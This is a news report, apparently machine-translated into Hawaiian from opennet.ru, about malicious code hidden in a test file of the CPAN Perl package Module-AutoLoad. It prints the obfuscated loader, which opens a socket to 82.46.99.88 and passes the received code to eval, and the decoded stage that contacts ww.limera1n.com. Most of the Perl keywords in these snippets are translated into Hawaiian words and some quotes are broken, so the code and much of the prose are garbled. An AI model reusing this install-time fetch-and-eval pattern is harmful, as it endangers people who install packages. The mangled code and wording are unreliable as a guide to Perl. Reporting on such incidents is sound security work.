ProHoster > Pūnaewele > nūhou pūnaewele > ʻIke ʻia ka code ʻino ma ka pūʻolo Module-AutoLoad Perl

ʻIke ʻia ka code ʻino ma ka pūʻolo Module-AutoLoad Perl

Ma kahi pūʻolo Perl i māhele ʻia ma o ka papa kuhikuhi CPAN Module-AutoLoad, i hoʻolālā ʻia e hoʻouka maʻalahi i nā modula CPAN ma ka lele, ʻike ʻia code hōʻino. ʻO ka hoʻokomo ʻino loaa ma ke code ho'āʻo 05_rcx.t, i hoʻouna ʻia mai ka makahiki 2011.
He mea pono ke ala mai nā nīnau e pili ana i ka hoʻouka ʻana i nā code nīnau Stackoverflow hoʻi i ka makahiki 2016.

Hoʻomaka ka hana ʻino i ka hoʻāʻo e hoʻoiho a hoʻokō i ke code mai kahi kikowaena ʻaoʻao ʻekolu (http://r.cx:1/) i ka wā o ka hoʻokō ʻana i kahi suite hoʻāʻo i hoʻomaka ʻia i ka wā e hoʻokomo ai i ka module. Ua manaʻo ʻia ʻaʻole hewa ke code i hoʻoiho mua ʻia mai ka server waho, akā i kēia manawa ua hoʻohuli ʻia ka noi i ka domain ww.limera1n.com, e hāʻawi ana i kāna ʻāpana o ke code no ka hoʻokō.

No ka hoʻonohonoho ʻana i ka hoʻoiho ʻana ma kahi faila 05_rcx.t Hoʻohana ʻia kēia code:

koʻu $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
koʻu $ ho'āʻo = `$^X $prog`;

ʻO ke code i kuhikuhi ʻia e hoʻokō ʻia ka palapala ../contrib/RCX.pl, nā mea i hoʻemi ʻia i ka laina:

hoʻohana i ka lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Hoʻouka kēia palapala huikau hoʻohana i ka lawelawe perlobfuscator.com code mai ka mea hoʻokipa waho r.cx (nā huaʻōlelo 82.46.99.88 e pili ana i ka kikokikona "R.cX") a hoʻokō iā ia ma ka poloka eval.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; paʻi <$b>;'
eval unpack u =>q{_<')I;G1[)&(];F5W ($E/.CI3;V-K970Z.DE….}

Ma hope o ka wehe ʻana, hoʻokō ʻia kēia mau mea: wae helu:

paʻi{$b=IO hou::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";valo return warn$@while$b;1

Ua wehe ʻia ka pūʻolo pilikia mai ka waihona. PAEA (Perl Authors Upload Server), a ua ālai 'ia ka mooolelo o ka mea kākau. I kēia hihia, e mau ana ka module loaʻa i loko o ka waihona MetaCPAN a hiki ke hoʻokomo pololei ʻia mai MetaCPAN me ka hoʻohana ʻana i kekahi mau pono e like me cpanminus. Hoʻomaopopo ʻiaʻaʻole i hoʻolaha nui ʻia ka pūʻolo.

hoihoi ke kūkākūkā pili a me ka mea kākau o ka module, ka mea i hōʻole i ka 'ike i hoʻokomo 'ia malicious code ma hope o kona paena "r.cx" i hacked a wehewehe i ka leʻaleʻa wale, a hoʻohana i ka perlobfuscator.com 'aʻole e hūnā i kekahi mea, akā, e ho'ēmi i ka nui. o ke code a maʻalahi i kāna kope ʻana ma o ka clipboard. ʻO ke koho ʻana o ka inoa hana "botstrap" i wehewehe ʻia e ka ʻoiaʻiʻo o kēia huaʻōlelo "e like me ka bot a ʻoi aku ka pōkole ma mua o ka bootstrap." Ua hōʻoia pū ka mea kākau o ka module ʻaʻole hana nā manipulations i ʻike ʻia i nā hana ʻino, akā hōʻike wale i ka hoʻouka ʻana a me ka hoʻokō ʻana i ke code ma o TCP.

Source: opennet.ru

Pākuʻi i ka manaʻo hoʻopuka